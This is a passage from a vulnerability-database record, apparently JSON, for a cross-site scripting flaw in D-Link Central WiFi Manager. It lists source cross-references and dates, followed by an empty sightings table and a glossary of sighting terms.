"url": "https://nvd.nist.gov/vuln/detail/cve-2018-17440"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20464"
},
{
"db": "VULHUB",
"id": "VHN-127903"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010759"
},
{
"db": "PACKETSTORM",
"id": "149673"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-274"
},
{
"db": "NVD",
"id": "CVE-2018-17443"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-20464",
"ident": null
},
{
"db": "VULHUB",
"id": "VHN-127903",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010759",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "149673",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201810-274",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2018-17443",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2018-10-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-20464",
"ident": null
},
{
"date": "2018-10-08T00:00:00",
"db": "VULHUB",
"id": "VHN-127903",
"ident": null
},
{
"date": "2018-12-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010759",
"ident": null
},
{
"date": "2018-10-04T23:23:13",
"db": "PACKETSTORM",
"id": "149673",
"ident": null
},
{
"date": "2018-10-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-274",
"ident": null
},
{
"date": "2018-10-08T16:29:02.320000",
"db": "NVD",
"id": "CVE-2018-17443",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2018-10-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-20464",
"ident": null
},
{
"date": "2018-11-23T00:00:00",
"db": "VULHUB",
"id": "VHN-127903",
"ident": null
},
{
"date": "2018-12-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010759",
"ident": null
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-274",
"ident": null
},
{
"date": "2024-11-21T03:54:25.620000",
"db": "NVD",
"id": "CVE-2018-17443",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-274"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "D-Link Central WiFi Manager Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010759"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-274"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.